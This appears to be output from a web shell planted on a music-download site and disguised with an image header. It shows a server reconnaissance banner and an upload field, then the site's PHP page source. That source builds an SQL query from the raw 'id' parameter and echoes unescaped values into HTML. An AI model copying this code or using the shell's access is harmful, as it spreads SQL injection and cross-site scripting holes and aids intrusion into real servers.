����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 3.144.95.167 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/redlighttunes.com/ |
Upload File : |
<?php include './php/connect.php'; include './php/time.php'; if (isset($_GET['id'])) { $id = $_GET['id']; $sql = "SELECT `file`,`artist`,`title`,`image`,`genre`,`downloads`,`streams`,UNIX_TIMESTAMP()-`time` as spent_time FROM `singles` WHERE `id`=$id"; $run = mysqli_query($conn, $sql) or die(mysqli_error($conn)); list($file, $artist, $title, $image, $genre, $downloads, $streams, $timeSpent) = mysqli_fetch_array($run); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- CSS --> <link rel="stylesheet" href="css/bootstrap-reboot.min.css"> <link rel="stylesheet" href="css/bootstrap-grid.min.css"> <link rel="stylesheet" href="css/owl.carousel.min.css"> <link rel="stylesheet" href="css/magnific-popup.css"> <link rel="stylesheet" href="css/select2.min.css"> <link rel="stylesheet" href="css/paymentfont.min.css"> <link rel="stylesheet" href="css/slider-radio.css"> <link rel="stylesheet" href="css/plyr.css"> <link rel="stylesheet" href="css/main.css"> <link rel="stylesheet" href="css/animate.css"> <!-- Favicons --> <link rel="icon" type="image/png" href="icon/redlighttunes.png" sizes="32x32"> <!--open graph codes--> <meta property="og:url" content="https://redlighttunes.com/single.php?id=<?php echo $id;?>" /> <meta property="og:type" content="website" /> <meta property="og:title" content="<?php echo "$artist - $title";?>" /> <meta property="og:image" content="https://redlighttunes.com/singles/covers/<?php echo $image;?>" /> <meta property="og:description" content="Stream and Download <?php echo "$artist - $title";?>" /> <meta property="fb:app_id" content="197362031139140" /> <meta name="description" content="Redlighttunes"> <meta name="author" content="Beaton Ndawa"> <title><?php echo "$title - $artist"; ?></title> </head> <body> <!-- header --> <header class="header"> <div class="header__content"> <div class="header__logo"> <a href="home"> <img src="./icon/redlighttunes.png" alt=""> </a> </div> <nav class="header__nav"> <a href="about">About</a> <a href="contacts">Contacts</a> </nav> <form action="search" method="POST" class="header__search"> <input type="text" name="search" placeholder="Search"> <button type="submit"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M21.71,20.29,18,16.61A9,9,0,1,0,16.61,18l3.68,3.68a1,1,0,0,0,1.42,0A1,1,0,0,0,21.71,20.29ZM11,18a7,7,0,1,1,7-7A7,7,0,0,1,11,18Z" /> </svg></button> </form> <div class="header__actions"> <div class="header__action header__action--search"> <button class="header__action-btn" type="button"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"> <path d="M21.71,20.29,18,16.61A9,9,0,1,0,16.61,18l3.68,3.68a1,1,0,0,0,1.42,0A1,1,0,0,0,21.71,20.29ZM11,18a7,7,0,1,1,7-7A7,7,0,0,1,11,18Z" /> </svg></button> </div> </div> <button class="header__btn" type="button"> <span></span> <span></span> <span></span> </button> </div> </header> <!-- end header --> <?php include './sidebar.php'; ?> <!-- main content --> <main class="main"> <div class="container-fluid"> <div class="row row--grid"> <!-- breadcrumb --> <div class="col-12"> <ul class="breadcrumb"> <li class="breadcrumb__item"><a href="home">Home</a></li> <li class="breadcrumb__item"><a href="c=singles">Singles</a></li> <li class="breadcrumb__item breadcrumb__item--active"><?php echo $title; ?></li> </ul> </div> <!-- end breadcrumb --> <!-- title --> <div class="col-12"> <div class="main__title main__title--page"> <h1><?php echo "$artist – $title"; ?></h1> </div> </div> <!-- end title --> <div class="col-12"> <div class="release"> <div class="release__content"> <div class="release__cover"> <img src="./singles/covers/<?php echo $image; ?>" alt="<?php echo $title; ?>"> </div> <a href="download.php?sid=<?php echo $id; ?>" class="release__buy">Download mp3</a> <a data-link data-title="<?php echo $title; ?>" data-artist="<?php echo $artist; ?>" data-img="stream.php?sid=<?php echo $id; ?>" href="./singles/audios/<?php echo $file; ?>" class="release__buy">Stream</a> </div> <div class="release__list"> <ul class="main__list main__list--playlist main__list--dashbox"> <li class="single-item"> <div class="single-item__title"> <h4> <i class="fa fa-clock"></i> <?php timeSpent($timeSpent); ?> </h4> </div> </li> <li class="single-item"> <div class="single-item__title"> <h4><i class="fa fa-download"></i> <?php echo $downloads; ?></h4> </div> </li> <li class="single-item"> <div class="single-item__title"> <h4><i class="fa fa-headphones"></i> <?php echo $streams; ?></h4> </div> </li> <li class="single-item"> <div class="single-item__title"> <h4><i class="fa fa-list"></i> <?php echo $genre; ?></h4> </div> </li> </ul> </div> </div> </div> </div> </div> </main> <!-- end main content --> <?php include './footer.php'; ?> <script> document.querySelectorAll("ul.sidebar__nav .sidebar__nav-item a")[1].classList.add("sidebar__nav-link--active"); </script> <?php include './scripts.php'; ?>